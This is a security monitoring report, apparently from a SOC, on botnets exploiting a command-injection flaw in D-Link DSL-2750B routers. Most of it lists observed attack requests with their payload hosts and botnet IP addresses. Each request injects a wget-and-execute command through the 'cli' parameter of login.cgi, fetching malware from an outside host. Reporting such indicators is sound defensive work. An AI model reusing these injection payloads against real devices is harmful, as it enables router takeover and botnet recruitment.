Tempest's monitoring team (SOC) identified and reported a variant of the Mirai botnet attempting to exploit five types of vulnerabilities in routers, including D-Link's DSL-2750B.

The vulnerability affecting this model was first disclosed on February 5, 2016, on Full Disclosure by a Quantum Leap researcher, and allows a remote, unauthenticated attacker to execute commands on the device.

Although the vulnerability is 3 years old, it is still widely exploited by a wide variety of actors. This month alone, the SOC identified at least 11 botnets attempting to exploit this router model.

Researchers suspect that most of these botnets are part of the malware campaign known as VPNFilter, reported by Cisco in partnership with Symantec.

According to the report, the malware is capable of collecting sensitive information, tampering with network traffic as it passes through an infected router, and even disabling the device altogether, and it maintains persistence across reboots (details of the infection stages can be found here).

It is believed that this campaign has already infected more than 500,000 routers from various brands such as ASUS, D-LINK, HUAWEI, LINKSYS, MIKROTIK, NETGEAR, QNAP, TP-LINK, UBIQUITI, UPVEL and ZTE in more than 54 countries.

It is also speculated that its creators have a particular interest in SCADA industrial control systems. In mid-July, Ukrainian officials claimed to have halted an attack on a water treatment company that reportedly used this malware.

Symantec has made available a tool to check whether a device has been affected by VPNFilter at this link.

Below is a list of the botnets we identified trying to exploit this vulnerability in Brazilian networks:

Payload source 104.244.72.82
GET /login.cgi?cli=aa aa';wget hxxp://104.244.72.82/k -O -> /tmp/k;sh /tmp/k'$ HTTP/1.1
User-Agent: Hello, World
Botnet unique IP addresses:
111.39.106.44
156.204.174.75
192.168.65.76
197.55.82.42
217.57.133.81
31.216.240.171
41.233.60.148
41.36.97.33
41.45.5.125
41.47.163.132
5.98.77.74
91.109.192.66

Payload source 178.128.11.199 (138 times)
GET /login.cgi?cli=aa aa';wget hxxp://178.128.11.199/qtx.mips -O -> /tmp/rz;chmod 777 /tmp/rz;/tmp/rz'
Botnet unique IP addresses:
111.168.199.94
112.68.179.151
112.70.128.241
114.180.42.251
114.188.213.89
115.37.18.252
116.64.34.5
117.18.179.32
118.108.73.37
118.111.168.230
118.19.126.68
119.173.57.99
119.229.175.240
119.240.84.96
119.244.248.18
121.112.63.191
121.2.89.121
121.85.84.190
122.197.94.218
123.0.126.94
123.176.158.247
123.198.100.69
123.198.2.20
123.48.141.222
124.141.28.58
124.159.133.2
124.241.170.48
124.246.230.97
124.25.131.117
126.114.212.200
126.119.6.240
126.119.8.141
126.24.149.207
126.90.59.69
128.28.54.186
133.208.242.26
150.147.59.196
151.21.81.82
151.30.64.31
151.40.209.135
151.72.251.181
151.74.22.161
153.129.15.63
153.182.127.162
163.131.120.48
163.131.167.23
176.62.58.113
180.11.158.142
180.20.240.24
180.53.69.234
182.165.90.235
192.168.65.76
197.58.24.141
202.231.97.223
203.141.120.105
210.251.184.63
213.13.119.80
217.57.133.126
217.94.23.57
218.217.114.239
218.229.166.151
218.41.195.86
218.47.16.78
219.118.135.245
220.145.30.79
220.211.132.90
220.220.28.220
220.254.160.192
222.150.241.115
223.135.114.142
27.113.192.217
27.141.204.100
27.142.132.247
27.86.59.192
37.97.109.60
47.98.141.123
58.157.32.157
58.158.140.185
58.3.75.159
59.166.42.20
59.168.180.92
60.62.206.60
61.200.76.69
61.23.6.29
61.26.94.245
77.157.30.118
79.44.198.124
80.144.115.148
80.18.66.18
82.127.0.203
83.34.72.238
83.59.82.192
86.205.109.199
87.12.80.173
92.152.212.2
93.237.32.163
94.80.225.50
95.239.128.123

Payload source 185.172.164.41 (17 times)
GET /login.cgi?cli=aa aa';wget hxxp://185.172.164.41/e -O -> /tmp/hk;sh /tmp/hk'
Botnet unique IP addresses:
151.33.237.205
151.53.171.253
151.61.83.67
156.208.255.165
156.212.165.224
192.168.65.76
197.38.149.124
41.235.60.227
41.35.212.65
41.43.222.213
41.46.204.218
41.47.6.52
62.103.224.151
93.17.114.2
94.95.85.42

Payload source 185.62.190.191 (107 times)
GET /login.cgi?cli=aa aa';wget hxxp://185.62.190.191/r -O -> /tmp/r;sh /tmp/r'
User-Agent: Hello, World
Botnet unique IP addresses:
103.234.226.15
106.112.139.150
118.163.105.220
119.18.73.18
123.21.6.128
151.31.12.17
151.66.87.250
151.73.115.199
152.238.136.60
152.238.82.155
152.238.91.91
153.142.239.28
164.77.54.189
168.196.104.213
168.196.105.94
177.222.190.65
177.83.226.19
179.108.39.66
179.108.39.92
179.24.197.49
179.24.65.185
179.25.29.161
181.143.160.146
182.231.148.23
185.104.125.70
187.127.58.118
192.168.65.76
195.158.93.59
200.222.161.49
206.189.125.14
212.103.28.240
212.159.145.223
212.19.124.108
213.167.232.124
213.167.233.123
220.133.230.106
24.103.251.210
37.203.236.29
58.236.33.87
62.99.77.193
73.72.115.42
77.253.229.136
77.69.223.240
81.119.116.122
82.56.190.241
85.211.202.152
87.127.18.60
87.138.108.161
89.120.213.253
89.148.11.57
92.3.30.123
92.8.85.159
92.8.95.119
95.232.4.236
95.236.174.14

Payload source 199.195.254.118 (93 times)
GET /login.cgi?cli=aa aa';wget hxxp://199.195.254.118/dlink -O -> /tmp/xd;sh /tmp/xd'
User-Agent: Gemini/2.0
Botnet unique IP addresses:
109.1.114.155
109.6.107.150
109.6.115.159
109.6.97.43
151.42.114.146
151.51.176.37
151.62.5.151
156.194.160.245
156.194.180.232
156.194.247.106
156.196.107.33
156.196.12.183
156.196.154.214
156.196.178.236
156.197.160.249
156.197.227.229
156.198.101.77
156.198.236.19
156.199.92.159
156.201.186.18
156.202.227.131
156.202.84.15
156.202.90.108
156.203.148.195
156.204.153.20
156.205.244.183
156.208.101.163
156.208.135.147
156.208.18.207
156.212.215.226
156.216.142.38
156.216.228.22
156.216.241.49
156.217.122.39
156.217.231.49
156.218.45.233
156.219.68.186
156.221.101.38
156.222.101.226
156.222.213.234
156.223.212.30
192.168.65.76
197.34.164.96
197.39.182.32
197.39.60.15
197.41.81.206
197.43.201.219
197.54.3.195
197.55.99.16
213.160.161.204
213.26.201.121
213.41.192.17
217.128.171.65
41.237.245.180
41.238.245.215
41.239.218.69
41.45.233.217
41.45.90.138
41.47.50.241
65.39.86.241
78.121.191.22
79.129.59.222
79.129.96.160
80.13.70.186
80.180.57.172
81.10.94.220
84.221.217.162
87.17.180.164
87.2.109.81
87.5.3.50
87.8.249.189
94.143.82.97
94.143.83.203
94.143.86.59
94.70.252.45

Payload source 217.61.6.127 (8 times)
GET /login.cgi?cli=aa aa';wget hxxp://217.61.6.127/t -O -> /tmp/t;sh /tmp/t'
Botnet unique IP addresses:
206.189.125.14
47.97.6.155

Payload source g[.]mariokartayy[.]com (4 times)
GET /login.cgi?cli=aa aa';wget hxxp://g.mariokartayy.com/x -O -> /tmp/x;sh /tmp/x'
User-Agent: Gemini/2.0
Botnet unique IP addresses:
156.218.84.96
192.168.65.76
41.42.165.170

Payload source hakaiboatnet[.]pw
GET /login.cgi?cli=aa aa';wget hxxp://hakaiboatnet.pw/dlink -O -> /tmp/hk;sh /tmp/hk'
User-Agent: Hakai/2.0
Botnet unique IP addresses:
179.176.4.0
197.41.119.155
197.44.186.55

Payload source 206.189.168.43
GET /login.cgi?cli=aa aa';wget hxxp://206.189.168.43/qtx.mips -O -> /tmp/rz;chmod 777 /tmp/rz;/tmp/rz'
Botnet unique IP addresses:
80.211.44.120
206.189.229.241

Payload source 185.158.114.160
GET /login.cgi?cli=aa aa';wget hxxp://185.158.114.160/exploit/mips.exploit -O -> /tmp/mips.exploit;sh /tmp/mips.exploit'
Botnet unique IP addresses:
175.101.9.29
182.74.239.142
85.15.229.60

Payload source 80.211.84.76
GET /login.cgi?cli=aa aa';wget hxxp://80.211.84.76/d -O -> /tmp/d;sh /tmp/d'
User-Agent: Hello, World
Botnet unique IP addresses:
187.65.211.141
185.12.177.63